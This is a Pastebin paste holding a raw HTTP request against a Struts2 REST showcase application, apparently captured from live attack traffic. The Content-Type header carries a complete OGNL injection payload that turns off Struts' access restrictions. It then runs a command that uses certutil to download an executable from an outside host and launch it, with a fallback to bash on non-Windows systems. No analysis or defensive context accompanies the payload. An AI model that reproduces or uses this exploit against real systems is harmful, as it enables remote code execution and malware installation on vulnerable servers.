Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- GET /struts2-rest-showcase/orders.xhtml HTTP/1.1
- Connection: Keep-Alive
- Content-Type: %{(#nike=\x27multipart/form-data\x27).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\x27com.opensymphony.xwork2.ActionContext.container\x27]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\x27cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe %SystemRoot%/Temp/ajqondozyjhfeqb27288.exe & cmd.exe /c %SystemRoot%/Temp/ajqondozyjhfeqb27288.exe\x27).(#iswin=(@java.lang.System@getProperty(\x27os.name\x27).toLowerCase().contains(\x27win\x27))).(#cmds=(#iswin?{\x27cmd.exe\x27,\x27/c\x27,#cmd}:{\x27/bin/bash\x27,\x27-c\x27,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
- Accept: */*
- Accept-Language: zh-cn
- Referer: http://<...ip...>:80/struts2-rest-showcase/orders.xhtml
- User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
- Host: <...ip...>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement